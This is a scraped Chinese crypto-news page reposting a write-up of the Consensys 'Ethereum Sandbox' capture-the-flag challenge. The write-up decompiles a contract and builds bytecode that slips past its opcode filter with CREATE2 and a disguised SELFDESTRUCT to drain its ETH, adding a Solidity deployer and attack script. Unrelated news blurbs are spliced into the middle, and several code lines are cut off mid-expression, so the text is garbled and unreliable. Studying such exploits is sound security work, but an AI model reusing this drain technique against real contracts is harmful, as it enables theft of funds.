宇宙链 宇宙链
Ctrl+D收藏宇宙链

Consensys CTF - " 以太坊沙盒 "

作者:

时间:1900/1/1 0:00:00

基于samczsun的解析文章学习

分析原文:

本文都是基于https://samczsun

elseif(0x2918435f==function_selector){0x2918435f();}elseif(0x4214352d==function_selector){0x4214352d();}elseif(0x74e3fb3e==function_selector){0x74e3fb3e();}

再看到其的全局变量,一共有两个,分别在slot0和slot1的位置处。可以看到这两个全局变量都是uint256数组。

uint256array_0;//STORAGEuint256_owners;//STORAGE

依次分析函数,找到我们感兴趣的部分,然后再深入调查该函数,看是否能够达到我们的目标——拿到该合约的所有ETH。

首先是函数1:0x4214352d

function0x4214352d(uint256varg0,uint256varg1)publicnonPayable{require(msg

//翻译一下functionset_array(uint256_value,uint256_key)public{require(msg

Layer2互操作性协议Connext宣布将支持zkSync网络:2 月 8 日,Layer2 互操作性协议 Connext 宣布支持 zkSync 网络,用户很快将能够在 11 个已支持的链和 zkSync 之间即时且廉价地转移资产,这同时意味着用户将能够直接从其他 L2 或侧链系统加入和退出 zkSync 生态系统,完全避免了支付 L1 gas 成本。[2022/2/8 9:37:29]

可以看到该函数主要是对array_0进行赋值,在赋值前检查了两项:

msg

=>functionget_array(uint256_key)publicviewreturns(uint256){require(msg

与set_array函数类似

再看函数3:owners

functionowners(uint256varg0)publicnonPayable{require(msg

=>functionowners(uint256_key)publicviewreturns(address){require(msg

最后看函数4:0x2918435f

function0x2918435f(addressvarg0)publicpayable{require(msg

v2=1;}require(v0);MEM=MEM(varg0

assert(v5<varg0

v7,v8=varg0

require(v7);}

OKExChain生态利率协议Spiral X获Consensus Lab、Bitrise Capital、K24?Ventures战略投资:据官方消息,Spiral X利率协议今日在Twitter宣布,Spiral X已获Consensus Lab (共识实验室)、Bitrise Capital (比升资本)、K24?Ventures战略投资,具体投资金额未披露。此前,Spiral X测试版本已在OKExChain Test完成部署,预计正式版本同步部署OKExChain,加速打造OKExChain上的DeFi乐高组合。

Spiral X 是一个基于智能合约,面向多链且开源的借贷市场协议,同时集合了安全可信的数据源价格信息和跨链桥,为需求方提供一站式的存款和借贷服务。v2版本将会推出针对长尾资产和NFT的抵押借贷,为长尾资产提供市场进入渠道以及价格敞口,在资金安全的前提上,积极创建更为丰富的借贷市场。[2021/4/8 19:59:17]

可以看到函数40x2918435f比较复杂,简单分析函数4中有三层require:

要求调用该函数的msg

v2=1;}require(v0);=>翻译一下:boolpermit=false;uint256i=0;while(i<_owners

i=1;}require(permit);

3.要求作为传入参数的地址addr,逐字节检查该参数地址对应的代码,要求其中不含有0xf0,0xf1,0xf2,0xf4,0xfa,0xff等字节。在黄皮书中这几个字节对应的分别是:create,call,callcode,delegatecall,staticcall,selfdestruct.这部分对应的代码比较复杂,我们将对比opcode,逐字翻译```MEM=MEM(varg0

assert(v5<varg0

}

问题分析-2

现在我们需要满足第三个条件,即构造一个合约,该合约对应的runtimecode中不含有0xf0,0xf1,0xf2,0xf4,0xfa,0xff等字节,因此需要我们手动来写合约,然后通过该sandbox的第四个函数来delegatecall该合约,从而清空sandbox中的ETH。

首先明确我们使用create2,其为0xf5,我们可以首先看下黄皮书中关于create2的定义

简单来说是先计算出要创建的合约的地址,然后执行要创建的合约的初始化代码,再将该初始化代码与要创建的合约地址进行关联。

故我们需要一个合约,他的runtimecode中执行一个create2函数,创建一个临时合约,并将上下文环境中的address(this)里的全部ETH都作为赠品赠与该临时合约,该临时合约的初始化代码中应该执行selfdestruct(tx.orgin)函数来将所有的ETH转移给合约部署人。

先用opcode来写runtimecode:

//tx.origin这里的ORIGIN是payload,不应该被执行,故需要改为push10x32//SELFDESTRUCT//构造payload,因为SELFDESTRUCT是0xff,不能被使用,故可以通过ADD来绕道实现push20x32fe//0x32fepush10x01//0x32fe0x01ADD//0x32ffpush10x40//0x32ff0x40mstore//构造payload0x40->0x32ff,push100//Us->salt盐push10x04//Us->length长度4push10x3e//us->offset偏移值->内存中0x400x20-0x2=0x3eADDRESSBALANCE//Us->ETH数量->应该是该address(this)的所有ETHcreate2=>6132fe60010160405260006004603e3031f5

在写该合约的初始化代码,可以用solidity写了,因为是我自己执行来部署该runtimecode

contractHackCTF{constructor()publicpayable{assembly{mstore(0x00,0x6132fe60010160405260006004603e3031f5)return(0x0e,0x12。}

然后部署HackCTF合约,在调用ctf中的第四个函数,将该合约的地址作为参数传进去即可

hacker=HackCTF.deploy({"from":alice})ctf.hack(hacker,{'from':alice})print(alice.balance())

免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。

本文来源于非小号媒体平台:

登链社区

现已在非小号资讯平台发布105篇作品,

非小号开放平台欢迎币圈作者入驻

入驻指南:

/apply_guide/

本文网址:

/news/10087897.html

免责声明:

1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险

2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场

上一篇:

SendingLabs完成1250万美元种子轮融资,以构建「Web3通信堆栈」

标签:INTUINREQLICFinancial Intelligence Group TokenPlatonic QuintessenceFREQAIRepublic Protocol

比特币最新价格热门资讯
老崔说币:雪上加霜,比特币暂无未来可言!

大家好,我是来自CKcoin平台首席分析师老崔说币,也是你们的朋友老崔说币Lcsb18888,老崔说币公众号同步专注数字货币行情分析,争取为广大币友传递最有价值的币市信息,欢迎广大币友的关注与点赞.

1900/1/1 0:00:00
中币开放XCH充值和提币业务

尊敬的中币用户: ????中币现已开放XCH的充值和提币业务。感谢您对中币的支持与信任! 中币运营团队 2021年6月21日 中币早行情:BTC现报33052美元:据中币(ZB)交易平台行情数据,截止到今日09:52时,BTC现报33.

1900/1/1 0:00:00
Gate.io 今日智能量化策略年化排行,七日年化收益率最高达101.66%

目前智能量化交易策略库包含网格交易、合约网格、MACD(指数平滑移动平均线)、双均线、MACD-RSI、双均线-RSI六种量化策略,用户可自由选择使用。杠杆倍数设置可放大本金,获取多倍收益.

1900/1/1 0:00:00
虎符关于创新区升级维护的公告(2021/6/18)

尊敬的虎符用户: 为了提升服务质量,进一步优化用户的交易体验,虎符将于2021年6月18日21:30-2021年6月19日07:00(UTC8)对创新区交易进行技术升级维护,预计此次升级维护时长约为9.5小时.

1900/1/1 0:00:00
BKEX Global 关于暂停部分币种交易和充提功能的公告

尊敬的用户: BKEXGlobal现决定暂停FTS/USDT、BOOB/USDT、AQUAGOAT/USDT、XDOGE/USDT、PMON/USDT、GINUX/USDT、SHIBSC/USDT、GLX/USDT、BUNNY/USD.

1900/1/1 0:00:00
周杰伦首次策展,孙宇晨以250万元拍得KAWS“包装画”作品

6月18日,波场TRON创始人孙宇晨以250万元的价格,在周杰伦与苏富比合作的首届“CONTEMPORARYCURATED:ASIA”艺术策展上,拍得KAWS在2001年创作的“包装画”系列之一《无题》.

1900/1/1 0:00:00